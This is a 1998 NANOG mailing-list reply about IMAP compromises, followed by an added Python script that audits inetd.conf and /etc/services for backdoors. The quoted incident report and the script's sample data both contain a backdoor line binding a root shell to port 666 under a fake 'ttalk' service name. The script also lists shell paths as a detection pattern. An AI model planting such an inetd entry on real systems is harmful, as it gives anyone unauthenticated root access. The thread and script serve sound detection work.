IMAP attacks continue
Alex P. Rudnev
alex at Relcom.EU.net
Tue Nov 24 11:31:06 UTC 1998
Btw. The best you can do is to install an access filter on the router and
log any attempts to connect to this port in your network; and if you
see such an attempt you should write a 'Hacker in your system (suspected)'
warning to the network admin where this connection originated from.
70% of these cases should be 'broken systems'.
On Mon, 23 Nov 1998, Phil Howard wrote:
> Date: Mon, 23 Nov 1998 09:35:17 -0600 (CST)
> From: Phil Howard <phil at whistler.intur.net>
> To: nanog at merit.edu
> Subject: Re: IMAP attacks continue
>
> An addendum to:
>
> > I found a machine that had Red Hat 5.1 unmodified running on it, and it
> > got hit. So I closed things off and looked around for damage and found
> > the following:
> >
> > 1. Syslogd had been killed off and the syslog file deleted.
> >
> > 2. A backdoor was installed in /etc/inetd.conf as follows:
> >
> > ttalk stream tcp nowait root /bin/sh sh -i
>
> I checked the port assignments from IANA and there is no such thing as
> "ttalk". I found this line in /etc/services:
>
> ttalk 666/tcp
>
> so it appears to be hijacking the port used by (as seen in the file
> ftp://ftp.iana.org/in-notes/iana/assignments/port-numbers):
>
> mdqs 666/tcp
> mdqs 666/udp
> doom 666/tcp doom Id Software
> doom 666/udp doom Id Software
>
> So also check /etc/services on any potentially compromised machines.
>
> --
> -- *-----------------------------* Phil Howard KA9WGN * --
> -- | Inturnet, Inc. | Director of Internet Services | --
> -- | Business Internet Solutions | eng at intur.net | --
> -- *-----------------------------* philh at intur.net * --
>
Aleksei Roudnev, Network Operations Center, Relcom, Moscow
(+7 095) 194-19-95 (Network Operations Center Hot Line),(+7 095) 239-10-10, N 13729 (pager)
(+7 095) 196-72-12 (Support), (+7 095) 194-33-28 (Fax)
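As an added example that is not part of this thread, the following Python script automates the two checks Phil Howard describes above: it flags any /etc/inetd.conf entry whose server program is a shell (the `ttalk ... /bin/sh sh -i` backdoor), and it compares each service's port in /etc/services with an official port-assignment list to catch a renamed port such as `ttalk 666/tcp` standing in for `mdqs`. The sample inetd.conf and services text are constructed to resemble the compromised Red Hat 5.1 host, and the `REFERENCE` table is a hypothetical excerpt standing in for the IANA port-numbers file the message cites.

```python
"""Audit /etc/inetd.conf against /etc/services and a port-assignment reference.

Added example, not from the NANOG thread. It reproduces the two checks the
thread recommends: look for inetd entries that spawn a shell (the 'ttalk'
backdoor), and compare /etc/services names with the official assignments.
"""

# Constructed sample input modelled on the compromised host described in the thread.
SAMPLE_INETD_CONF = """\
# service  socket  proto  wait/nowait  user  server-program  arguments
ftp      stream  tcp  nowait  root  /usr/sbin/tcpd  in.ftpd -l -a
telnet   stream  tcp  nowait  root  /usr/sbin/tcpd  in.telnetd
imap     stream  tcp  nowait  root  /usr/sbin/tcpd  imapd
echo     stream  tcp  nowait  root  internal
ttalk    stream  tcp  nowait  root  /bin/sh         sh -i
"""

SAMPLE_SERVICES = """\
ftp      21/tcp
telnet   23/tcp
echo     7/tcp
imap     143/tcp   imap2
ttalk    666/tcp
"""

# Hypothetical excerpt of the IANA port-numbers list (constructed for this example;
# in practice load the real assignments file the thread cites).
REFERENCE = {
    (7, "tcp"): "echo",
    (21, "tcp"): "ftp",
    (23, "tcp"): "telnet",
    (143, "tcp"): "imap",
    (666, "tcp"): "mdqs",
}

# Programs that should never be an inetd server: whoever connects gets a shell.
SHELLS = {"/bin/sh", "/bin/bash", "/bin/csh", "/bin/ksh", "/bin/tcsh", "/bin/zsh"}


def _fields(text):
    """Yield the whitespace-split fields of each non-comment, non-empty line."""
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            yield line.split()


def parse_services(text):
    """Map service name -> (port, proto) from /etc/services-style text."""
    table = {}
    for f in _fields(text):
        port, proto = f[1].split("/", 1)
        table[f[0]] = (int(port), proto)
    return table


def parse_inetd(text):
    """Return inetd.conf entries as dicts; lines with too few fields are skipped."""
    entries = []
    for f in _fields(text):
        if len(f) < 6:
            continue
        entries.append({"service": f[0], "proto": f[2], "user": f[4],
                        "server": f[5], "args": f[6:]})
    return entries


def audit(inetd_text, services_text, reference):
    """Return a list of (service, reason) findings for suspicious inetd entries."""
    services = parse_services(services_text)
    findings = []
    for e in parse_inetd(inetd_text):
        name = e["service"]
        # Check 1: an inetd entry that hands a connecting client a shell.
        if e["server"] in SHELLS:
            findings.append((name, "inetd spawns a shell: %s %s as %s"
                             % (e["server"], " ".join(e["args"]), e["user"])))
        # Check 2: does /etc/services map this name to a port someone else owns?
        if name not in services:
            findings.append((name, "no /etc/services entry; inetd cannot bind it"))
            continue
        port, proto = services[name]
        official = reference.get((port, proto))
        if official is None:
            findings.append((name, "%d/%s has no official assignment" % (port, proto)))
        elif official != name:
            findings.append((name, "%d/%s is officially '%s', not '%s'"
                             % (port, proto, official, name)))
    return findings


if __name__ == "__main__":
    for service, reason in audit(SAMPLE_INETD_CONF, SAMPLE_SERVICES, REFERENCE):
        print("%-8s %s" % (service, reason))
```

Run against the sample data it reports two findings, both for `ttalk`: the shell server and the port-name mismatch on 666/tcp. Locally defined services on unassigned ports will also appear in the "no official assignment" bucket, so treat the output as a review list to compare against a known-good copy of both files rather than as proof of compromise by itself.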